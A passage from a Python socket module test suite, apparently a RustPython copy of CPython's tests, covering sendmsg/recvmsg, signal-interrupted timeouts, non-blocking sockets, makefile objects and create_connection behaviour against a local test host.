class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@unittest.skip("TODO: RUSTPYTHON, plistlib")
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@unittest.skip("TODO: RUSTPYTHON, plistlib")
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@unittest.skip("TODO: RUSTPYTHON, plistlib")
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except socket.timeout:
pass
except OSError as exc:
if support.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('socket.timeout not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
